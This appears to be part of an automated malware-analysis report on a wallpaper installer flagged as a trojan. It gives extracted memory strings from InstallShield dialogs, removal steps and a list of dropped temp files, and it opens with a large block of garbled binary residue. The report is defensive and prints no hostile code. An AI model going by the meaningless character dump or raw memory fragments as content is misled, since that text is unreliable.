,6,6,666
))):||||
2222222222222
222222222222222
):::||||
;{;{;;3;
{;{{;;{;
6,66,,,,
6,,666,,,
>>>///>///>>>
,6,,6,,,
>>/>//>/
>//>/>>>
///>>/>/>
#$)))'--'-..1/..1...,,. ',  (& &(,&&(,&,&(&,& ',&,(,&,,, ,046782
#!#&))-&--1'...   ,,,&&(,&&(& (,&'(,&'(&,&'&(&(&'&'&(&&',&,,0465
$#!)))'&--'*. (,(,,(,&(,&'(,&&(&',&&'&,'&',&,&,& (,&,& (,&,& &.5.
#$!)))-)-*-,&  & &'& (&&,&(',&&,&&',&'&,&(&'(&&(&&&'&(&(&(&'(,&,,
$$!#&)&&'& ,&&(&(,(,&& (&,& &',&',&',&'& ',&,&,&,(,&,&,& &,&,',& 
#$)!))&',&,&,',&,&'& (,&& &'&''&'&'&'&&&''&'&&'(&'&'&'(&'(&&'&&',&
$$!#*'*'* ,&&',&&'&&&&'"&&&&!&
!&&'&'(&(&&&'(&'&&'&'&((& &
#&&'&'&'&'&&&!&&!&
&&&',& &,(,&,&,(,&,&,& &(&
#!&&''!&&!&
!& (&(&(&'&'&&&'&'&((&'(& &
!)&,&&&!&
&'& &',&(,&,(,&,&,& &,&,(&
#!&&',&&&&!!
&&' ',&& &'&'&'(&'(&(&&'&'&
!& ,', (,&(,&,&,&,&,& (,&,&,
$!!)&& &',&''&&"!
!!)&!''.,//,/',&&'(&'(&&&'&(&(&'&'
!$!)'&- /,///.01021//,',&,&,&,',(,&,&,&,&&
'&&&&!&!$
$#!&))&.'./10/4222442420/, &'(&&'&(&'&&'&'&'(,&
&&'&'&/#
&&'"%"%!!
!&&"&&&"%&!%!$!$!))&'-. 1/22244447474442//'&,&,&,&,& (,&,&,&&'&'
)"&"&"&"'&"&&"&!&&&&---.//2224447464474420, (&'(&&'&(&&'&'(&',&,&
!&"'&&&,& &',06878787440 ,&,& &,(,& (,& (,&,& (,& 
!&&&'(,&(&(&& 478878470.,'&(&(&&'&(&(&('(&&&'(&'&(
&"'&(&(& &'&&/47787745 ',&,& (,&,&,& &,& (,&,&,&'
$'&&(&&&,&(&&&&.7877460 (&'&(&&'(&&'&(&&'(&'&&'&,&
&&'&&'(&&(&'&& .478854,,&,&,& (,& (,& (,&,&,(,&,&(
&'&,(& (,& &'&&,,68764,,&&'(&(&'&(&(&&(&(&&'&'(&'&
!)&'. /.,/ &(,&& &&',,0744.('(&'&&'&(&&'&'&(&(&&'&'(&'&
$!)&&- .,//2/// ,&&'(&,& &(,.40.,&'(&&'&'(&'(&(&&'&(&'(&'(&&'
#!&)'*. ../2//2, & (& &'&(& &,45 ((,& (,&,&,&,& (,&,&,&,&,& (&
#$!)&- . /10/2///'(&&&'(,&,&(,,.., '&(&(&(&'&(&'(&'(&'&(&&'(&,&
!#&)'. //1/02300, &&(,&&&'&',&,,,,&(,&,& &,',&,&,&,&,&,& (,&&'&
!)&- .,/010202/ '(&&&,(,&,&&',,&,&&&'&(&(&&&'&&'(&&'&'(&&& (,&
! ! !!&'- .0/102240.'(&&(&'&'(&(,&,',& (,&,& &,(,&,&,& (,&,& (,&&&'
! "!!&& //.202440.,,'(&&&(,& &'&(&'&(&&'&(&'(&''((&(&(&'(&('(&'(,&
" ! "!&& /.2024.440'&&&'&,&(&(,&,&,&,& (,&,&,&,&,& & &,&,&,& &,',&'
! "!"! !'/1244420,'&'&&&'(&&',&,&,& (,& (,&,&,&,& & &,(,&,&,& (,&,
'.42442, (&&(&(&(&,&&'&(&'(&'&(&&&'&&(&'(&(&&&'&&(&'(&'(&
"! !!!&/24445 &&'&&&'&&'(,&,&,&,&,&,& (,&,&,&,&,& (,&,&,&,&,& &
"! ! ! &,0472.'(&&&'(&(&(&'(&(&'&&&'&((&'((&'&&'&((&'((&'&&'&((&
! " "!"! " 0440,'&&&'&&&&(&',& &,',(,&,& &,& &,(,&,& &,& &,(,&,& &
"! " !&'.445''&'"&'(&&&&(&&(&(&&'&(&'((&'(&&'&(&'((&'(&&'&(&'(&
!! "! "!&"&,24.(&&&&'&'&(&(&(,& & (,& &,& &,& (,& &,& &,& (,& &,& 
!" ! ""& .5,'&"'"&&&'&'& &(&((&((&((&((&((&((&((&((&((&((&((&('
!"!&"&"'..,'&&&''&'&&'&',& & & & & & & & & & & & & & & & & & &
! &"   "&& &&'&&'&&'&'&'&'&'&'&'&'&'&'&'&'&'&'&'&'&'&'&'&'
&[[[[FKEEEC?953).ILSPPRRPSTVVWYYZZZ[[[[[[Q&
####'"""!
7<##''(,,-28!
##''((,-6!
33333333333330
@10550,10551;1;0;;0,128,128
Please insert the next disk, Disk %d. If the files on this disk can be found in another location, for example, in another drive, enter its full path or click the Browse button to select its path.
Enter the password required to run this setup. Please note that passwords are case sensitive. Click Next to continue.
Password
This setup has been password protected.
Enter the user name and password that should be used to log on.
&Password:
Specify a SQL Login ID and Password.
Database Server Login
Database server requires login credentials to continue.
&Login ID:
&Windows authentication
S&QL Server authentication using the Login ID and password below
@10550,10551;1;0;;0,128,128
c:\path\company\product\suite\version
@10553,10553;1;0;;0,128,128
Restarting Windows
c:\folder\company\product
A read only file, %s, was found while attempting to copy files to the destination location. To overwrite the file, click the Yes button, otherwise click the No button.
c:\path\company\product
&Let Setup modify the %s file.
&Save the required changes to %s file.
This text is modifed by the 'szMsg' parameter. You can reposition controls in this dialog and add static text fields.
Press the PAGE DOWN key to see the rest of the agreement.
%s of space required on the %s drive
%s of space available on the %s drive
Specify a user account and password.
Con&firm password:
YAn internal read error has occurred on %s. Unable to load setup instructions.
Error 703.L%s file has become corrupted. Unable to load setup instructions.
Setup has detected a possible infinite loop in the script with function %s. Make sure you are handling the error return codes properly.
Error 425.ESetup is unable to find the installation script file: %s
Error 426.ASetup is unable to load the installation script file.
]Setup is unable to copy the installation support file %s to a temporary location.
Setup is unable to copy the installation support file _SETUP.LIB to a temporary location. Make more space available and try again.
Error 421.GSetup is unable to expand the installation support file %s.
Setup is unable to load the installation script file: %s
%d %%oSetup has detected that unInstallShield is in use. Please close unInstallShield and restart setup.
Error 432.iAn attempt was made to access a structure with an invalid pointer. The setup will terminate.
SSetup is unable to initialize the installation program ( INSTALL.EXE ).
Error 201.CSetup is unable to initialize the installation program.
Error %d.
qUnable to write to response file '%s' during recording. Please ensure enough space is available on target drive.
Invalid mode..Required data not found in the Setup.iss file.
Please free up some disk space or modify your selections.gSetup is complete. You may run the installed program by double-clicking on the installed program icon.
Installing...0There is not enough space available on the disk.LPlease free up some space or change the target location to a different disk./This program requires VGA or better resolution.(Do you want to view the ReadMe file now?MGeneral file transfer error. Please check your target location and try again.
Copying program files...#Creating Program Group and Icons...$Setup program cannot modify file %s."Unable to create target folder %s. Please check write access to %s.
Unable to locate file %s.!Please select a different folder.
Keep the older version.?You may run setup at a later time to complete the installation.*Do you want to quit the setup program now?#Do you want to continue this setup?QIf you choose to continue, the setup program will overwrite the existing version.)The setup program failed to load file %s.dSetup program has successfully modified the %s file, and the old version of the file is saved as %s.$A version of %s is currently in use.2Please close all applications and run setup again.&Please select the installation folder.
Select the type of setup.RYou must quit all programs and restart your computer before using the application.
Error NumberFThe setup program cannot save the newly modified %s file back to disk.=A folder name cannot contain any of the following characters:
You may run the setup program at a later time to complete the operations.
Your system has not been modified. To install this program at a later time, please run the setup again.&Click Finish to exit the Setup wizard.YSelect the features you want to install, and deselect the features you want to uninstall.
CRC error: The file %s doesn't match the file in the setup's .cab file. The medium from which you are running the setup may be corrupted; contact your software vendor.9The following error occurred on the file '%s'.
%s (0x%x)
Locked file: %s
Click Postpone to change this file the next time you restart your computer; click Skip to leave this file unchanged.EUnable to locate the file %s on disk %d. Please select an operation.0Please insert disk %d that contains the file %s.
Read-only file: %s
Do you want InstallShield to modify this read-only file?bCannot add feature. FeatureAddItem was unable to add a feature to the script-created feature set.lSpecified feature already exists.
Specified feature cannot be deselected. FeatureSelectItem was called to deselect a feature required by a currently selected feature.pSpecified feature name is not valid.
The value passed in the second parameter of FeatureInitialize is not valid.
Attempted operation not allowed with script-created feature sets.
A script-created feature set name was passed to a feature function (for example, FeatureFileInfo) that operates only on file media.
When calling FeatureFileEnum, FeatureFileInfo, FeatureListItems, or FeatureSetupTypeEnum, verify that the list you are passing to the function is valid.
Attempted operation not allowed with file media library. A file media name was passed to a feature function (for example, FeatureAddItem) that operates only on script-created feature sets.nMedia is already initialized.
The file Data1.cab is corrupt, or the file specified in a call to FeatureInitialize is not an InstallShield-generated cabinet file.
Specified password does not match.
The specified password does not match the password stored in the specified file media library or feature.
Specified password cannot be found.
FeatureValidate was called to validate a feature or a file media library for which no password has been set.
The media or the feature password was not validated.
Invalid value passed to a feature-related function.
One of the values passed to a feature function is invalid. This error can be caused, for example, by passing an empty string in the second parameter of FeatureAddItem.xData cannot be read from the Internet.
This error occurs when using InstallFromTheWeb in conjunction with InstallShield.
This error occurs when using InstallFromTheWeb in conjunction with InstallShield. The Internet connection has been lost and cannot be reestablished by InstallFromTheWeb.
Cabinet file generated by an older version of InstallShield. Verify that the project was built with your most recent version of InstallShield. Verify that you are not using mismatched cabinet files generated by different versions of InstallShield.TUnable to decompress a file. An internal error occurred. Contact technical support.
The target disk or directory has insufficient free space; the disk space can not be determined because TARGETDIR is invalid; or a script-defined folder of a feature has not been set.VEnterDisk function called failed. Internal error occurred. Contact technical support.
Specified file cannot be opened as read-only. The file Data1.cab (or one of the other data cab files) is missing or corrupted; or an uncompressed data file is missing from a CD-ROM, Data As Files build.jSpecified file cannot be opened as read/write. Unable to append to split file. Contact technical support.
Unable to self-register a file properly. This error has many possible causes. For details, refer to article Q101538 in the InstallShield Knowledge Base.^Unable to update a shared file in FeatureMoveData. Internal error. Contact technical support.EUnable to write to a file.
Internal error. Contact technical support.
Error renaming a file. An attempt was made to transfer an executable file (an .exe or .com file) over a locked file without setting the Potentially Locked property to Yes.
Unknown Error.RDo you want to completely remove the selected application and all of its features?.Feature:
Shared file: %s
%d$Read-Only File Found - InstallShield
&Try AgainJResolution is equal to %d, this program requires VGA or better resolution.:The following files did not self-register or unregister:
Error : 0x%x
Unhandled Exception"Error Number: 0x%X
Description: %s
Removed0Specify the location of the file %s to continue.
Setup needs the file %s
Internal Failure"Error Number: 0x%X
KInstallShield Wizard has finished performing maintenance operations on %p.
DifferenceshThe InstallShield Patch Wizard will install the patch for %P on your computer. To continue, click Next.0Welcome to the InstallShield Patch Wizard for %PHAre you sure you want to completely remove '%s' and all of its features?CThe wizard was interrupted before %P could be completely installed.
InstallShield Wizard Completed.PNetwork Location
Enter the network location or browse to a location. Click Install to create a server image of %P or click Cancel to exit the wizard. Fatal error during installation.FConsult Windows Installer Help (Msi.chm) or MSDN for more information.(Resuming the InstallShield Wizard for %PVWizard will complete the installation of %P on your computer. To continue, click Next.
%s - InstallShield Wizard_The installed version of the application could not be determined. The setup will now terminate.]The current version of the application could not be determined. The setup will now terminate.<The version comparison failed. The setup will now terminate.
]The password you have entered is incorrect. You must enter the correct password to continue.
This setup requires Internet Information Server 4.0 or higher for configuring IIS Virtual Roots. Please make sure that you have IIS 4.0 or higher.uThe version of %s present does not meet this setup's minimum requirements. This installation requires %s %s or later..There was an error logging in to %s.
Error: %sZThere was an error running the SQL script %s. Setup will now terminate.
Line: %d
Error: %spThe SQL script '%s' could not be run because no valid connection to the server exists. Setup will now terminate.5SQL script support has not been properly initialized.HSupport for database server failed to initialize. Setup will terminate./There was an error detecting the version of %s.gBrowsing or connecting for database servers requires that MDAC be installed. Setup will now terminate.
This installation requires a Microsoft SQL Server. The specified server '%s' is a Microsoft SQL Server Desktop Engine or SQL Server Express.)The InstallShield Wizard is installing %P(The InstallShield Wizard is modifying %P(The InstallShield Wizard is repairing %P'The InstallShield Wizard is removing %P
(String %s was not found in string table.
Error loading NetApi32.DLL. The ISNetApi.dll needs to have NetApi32.DLL properly loaded and requires an NT based operating system.\Server not found. Verify that the specified server exists. The server name can not be empty.&Unspecified error from ISNetApiRT.dll.
Unhandled exception.,Invalid user name for this server or domain.*The case-sensitive passwords do not match.
Error getting group.SError adding user to group. Verify that the group exists for this domain or server.
Error creating user.<ERROR_NETAPI_ERROR_NOT_PRIMARY returned from ISNetApiRT.dll."The specified user already exists.#The specified group already exists.^Invalid password. Verify that the password is in accordance with your network password policy.
Invalid group.IThe user name can not be empty and must be in the format DOMAIN\Username.>Error loading or creating INI file in the user TEMP directory.
ISNetApiRT.dll is not loaded or there was an error loading the dll. This dll needs to be loaded for this operation. Verify that the dll is in the SUPPORTDIR directory.WError deleting INI file containing new user information from the user's TEMP directory.
2Error getting the primary domain controller (PDC).8Every field must have a value in order to create a user.QODBC driver for %s not found. This is required to connect to %s database servers.%Unable to initialize XML runtime .dll/Unexpected error updating XML files. Error: %dxThis setup requires MSXML 3.0 or higher for configuring XML files. Please make sure that you have version 3.0 or higher.%Error updating XML file %s. Error: %d$Error opening XML file %s. Error: %d
There was an error attempting to open connection %s. No valid database metadata associated with this connection. Setup will now terminate.ZThere was an error creating database %s. Setup will now terminate.
Server: %s %s
Error:%s`There was an error connecting to database %s. Setup will now terminate.
Error: %sjThere was an error retrieving schema version from %s %s. Setup will now terminate.
Database: %s
Error: %seThere was an error writing schema version to %s %s. Setup will now terminate.
Error: %szThere was an error attempting to run the SQL script %s. The SQL script file could not be opened. Setup will now terminate.LThere was an unexpected error running SQL scripts. Setup will now terminate.
There was an error loading %s. This file needs to be loaded for InstallShield SQL operation. Verify that the file is in the SUPPORTDIR directory. Setup will now terminate.UFrom the list of catalog names below, select the database catalog you like to target.

%original file name%.exe_188_rwx_01BBC000_00002000:

kernel32.dll
14.0.162
_IsRes.dll

%original file name%.exe_188_rwx_01BC0000_00002000:

The procedure %s could not be located in the DLL %s.
The ordinal %d could not be located in the DLL %s.

setup.exe_880_rwx_10004000_00001000:

callback%d


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager): No processes have been created.
  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\Offer2.zip (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\inner.png (146 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\blowfish.dll (22 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\DSS_Unq_IMapplication_mon_remote_dcmd[1].htm (620 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\OfferScreen_12.html (1681 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\Math.dll (2489 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\Offer1.zip (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\FirstResult.txt (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\registry.dll (25 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\SecondResult.txt (620 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\nsCBHTML5.dll (1660 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\nsisunz.dll (211 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\serlib.dll (16 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\img12_1.jpg (145 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\UserInfo.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\FCL_htiw_qinu[1].htm (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\OfferScreen_422.html (1969 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\header.bmp (1568 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\manlib.dll (26 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\GetVersion.dll (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\nsDialogs.dll (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\dotn1ba3.rra (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\DigiAqua_7598[1].exe (66929 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\{DDEF27CB-1234-106A-A265-901201505041}\DIFx1bd2.rra (87 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\{DDEF27CB-1234-106A-A265-901201505041}\isrt1c10.rra (7316 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\{DDEF27CB-1234-106A-A265-901201505041}\difx1c5f.rra (10582 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\Disk1\setup.ini (498 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\setup.ini (498 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Delta Tail Betta Wallpaper\UninstallDeltaTailBetta.lnk (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\{DDEF27CB-1234-106A-A265-901201505041}\setu1b74.rra (7348 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\setu294f.rra (4984 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\{DDEF27CB-1234-106A-A265-901201505041}\Stri1bd2.rra (791 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\Disk1\layout.bin (437 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\{DDEF27CB-1234-106A-A265-901201505041}\defa1c20.rra (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\{DDEF27CB-1234-106A-A265-901201505041}\Font1bc2.rra (40 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\Disk1\_Setup.dll (5520 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\Disk1\data1.hdr (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\_Setup.dll (2784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\{DDEF27CB-1234-106A-A265-901201505041}\_IsR1c3f.rra (4314 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\core1ba3.rra (2334 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\Disk1\data1.cab (27704 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\Disk1\ISSetup.dll (18424 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\Disk1\setup.exe (12536 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
